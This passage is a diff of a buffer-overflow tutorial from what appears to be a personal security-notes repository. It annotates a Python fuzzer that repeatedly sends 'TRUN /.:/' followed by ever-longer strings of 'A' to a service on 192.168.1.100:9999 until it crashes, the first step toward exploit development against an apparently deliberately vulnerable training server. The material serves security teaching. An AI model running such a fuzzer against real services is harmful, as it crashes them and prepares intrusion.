Fz3r0/Fz3r0/Cyber-Security-&-Hacking/Buffer-Overflow/buffer-overflow.md

                 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                 s.connect(('192.168.1.100', 9999))

-                # Once we've connected, we will send a "TRUN" command:
+                # Once we've connected, we will send a "TRUN" command plus:  "s.send(('TRUN /.:/' + buffer))"

                     # We are using TRUN because we know is the vulnerable command in this case.
                     # The registers /.:/ are the strings that the command needs to "understand" the command (those appear in the string of the Regs in Immunity Debugger)
                     # + buffer: We are adding the buffer variable "A * 100", so...

                         # WE ARE SENDING: TRUN/.:/ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

+                    # Then, we are closing the connection with "s.close()"

+                    # Then, we sleep for 1 second the program with "sleep(1)"

+                    # Finally, we add to the variable "buffer" other A*100, so now, it will send 200...

+                    # The loop repeats: 100,200,300,400,500,600... the buffer will get bigger and bigger until the program breaks.
+        # THE TRICK IS, WE ARE TRYING TO NARROW DOWN WHERE THE PROGRAM IS BREAKING AND WITH WHICH SPECIFIC BYTE SIZE.
+        # SO, WE GOING TO FUZZ IT:

                 s.send(('TRUN /.:/' + buffer))
                 s.close()
                 sleep(1)
                 buffer = buffer + "A"*100

+        # WHEN IT BREAKS, IT WILL PRINT AN EXCEPTION SHOWING EXACTLY WHERE IT CRASHED:

         except:
                 print "Fuzzing crashed at %s bytes" % str(len(buffer))